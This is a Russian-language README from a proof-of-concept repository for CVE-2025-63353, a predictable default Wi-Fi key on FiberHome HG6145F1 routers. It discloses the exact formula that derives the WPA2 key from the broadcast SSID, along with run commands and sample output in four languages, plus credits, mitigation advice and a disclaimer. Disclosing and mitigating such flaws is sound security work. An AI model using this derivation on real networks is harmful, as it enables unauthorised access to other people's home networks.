## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZVCKSTER-CVE-2025-63353
# CVE-2025-63353 PoC - Предсказуемый Wi-Fi PSK по умолчанию FiberHome HG6145F1
    
> Образовательный исследовательский набор и мультиязычный PoC для **CVE-2025-63353** — критической уязвимости предсказуемого PSK по умолчанию, затрагивающей устройства GPON ONT FiberHome HG6145F1 RP4423.
## Сводка
Заводской Wi-Fi pre-shared key на затронутых устройствах FiberHome HG6145F1 является детерминированной функцией транслируемого SSID. Злоумышленник, наблюдающий кадр-маяк от уязвимого устройства, может вычислить WPA2 PSK за постоянное время без перехваченного handshake, без словаря, без GPU и без взаимодействия с клиентом.
Для устройства, транслирующего SSID `fh_<hex_a>`, PSK по умолчанию вычисляется так:
root@kitploit:~
PSK = "wlan" + hex(0xFFFFFF XOR hex_a)
**Пример:** `fh_a1f9d1` → `wlan5e062e`
Эффективное пространство ключей для одного устройства равно **1**. Пространство ключей для всей совокупности развертываний HG6145F1 составляет не более **2²⁴ ≈ 16,7 миллиона** пар (SSID, PSK), и поскольку SSID транслируется, отображение SSID→PSK является взаимно однозначным.
## Благодарности
Эта работа полностью основана на оригинальном исследовании и публичном раскрытии уязвимости **Hani Anis Bouzid** :
* **Оригинальное раскрытие:** статья на Medium
* **Оригинальный PoC:** github.com/hanianis/CVE-2025-63353
* **Запись CVE:** CVE-2025-63353
Вся заслуга в обнаружении уязвимости и первичном публичном раскрытии принадлежит Hani Anis Bouzid. Этот репозиторий расширяет оригинальное раскрытие мультиязычными реализациями PoC и подобранным комплектом технической документации.
## Содержимое репозитория
root@kitploit:~
.
├── README.md
├── LICENSE
├── docs/
│ ├── vulnerability.md Technical analysis of the algorithm
│ ├── timeline.md Disclosure chronology and vendor response
│ ├── affected-deployments.md Device specifications and known deployments
│ ├── related-research.md Lineage of predictable-PSK vulnerabilities
│ ├── references.md Curated bibliography
│ └── mitigation.md Guidance for users, ISPs, and vendors
└── poc/
├── python/ pure-Python implementation, no dependencies
├── go/ standalone Go binary
├── javascript/ browser-friendly JS / Node.js
└── c/ portable single-file ANSI C (compiles anywhere)
## Быстрый старт
root@kitploit:~
# Python
python3 poc/python/fh-poc.py fh_a1f9d1
# wlan5e062e
# Go
cd poc/go && go run fh-poc.go fh_a1f9d1
# wlan5e062e
# JavaScript (Node)
node poc/javascript/fh-poc.js fh_a1f9d1
# wlan5e062e
# C
cc poc/c/fh-poc.c -o fh-poc && ./fh-poc fh_a1f9d1
# wlan5e062e
Все четыре реализации написаны независимо, не имеют зависимостей и выдают одинаковый результат. Используйте ту, которая соответствует вашему окружению.
## Затронутые устройства
Поле| Значение
---|---
Производитель| FiberHome (Wuhan FiberHome International Technologies)
Модель| HG6145F1
В настоящее время уязвимость раскрыта только для прошивки HG6145F1 RP4423. Проверка на более широком семействе моделей HG6145 / HG6243 / HG6821 остаётся открытым исследовательским вопросом. См. docs/affected-deployments.md.
## Смягчение
**Для конечных пользователей HG6145F1:**
1. Немедленно смените Wi-Fi PSK по умолчанию на случайно сгенерированную парольную фразу длиной 16+ символов.
2. Отключите WPS.
3. Если ваш интернет-провайдер управляет обновлениями прошивки, узнайте, доступна ли исправленная прошивка.
Рекомендации для интернет-провайдеров и вендоров см. в docs/mitigation.md.
## Отказ от ответственности
Этот репозиторий опубликован **только в образовательных целях и для исследований в области защитной безопасности**. Описанная здесь уязвимость публично раскрыта под идентификатором CVE-2025-63353 и получила критический уровень опасности от CISA-ADP.
Использование кода из этого репозитория против сетей, которые вам не принадлежат или на тестирование которых у вас нет явного письменного разрешения, **противозаконно** в большинстве юрисдикций, включая марокканский Закон 07-03 о киберпреступности, европейские правовые акты о компьютерных злоупотреблениях, американский Закон о компьютерном мошенничестве и злоупотреблениях (Computer Fraud and Abuse Act) и аналогичное законодательство в других странах. Авторы не несут ответственности за неавторизованное использование данного материала.
## Ссылки
Полная библиография первоисточников, связанных уязвимостей и академической литературы поддерживается в docs/references.md.
## Вклад
Приветствуются проверенные результаты тестирования дополнительных моделей FiberHome, версий прошивок или вариантов, кастомизированных интернет-провайдерами, через pull request в `docs/affected-deployments.md`. Пожалуйста, указывайте версию прошивки, префикс SSID на этикетке устройства и метод проверки.
## Автор
**Ayman Wadi** — инженер по безопасности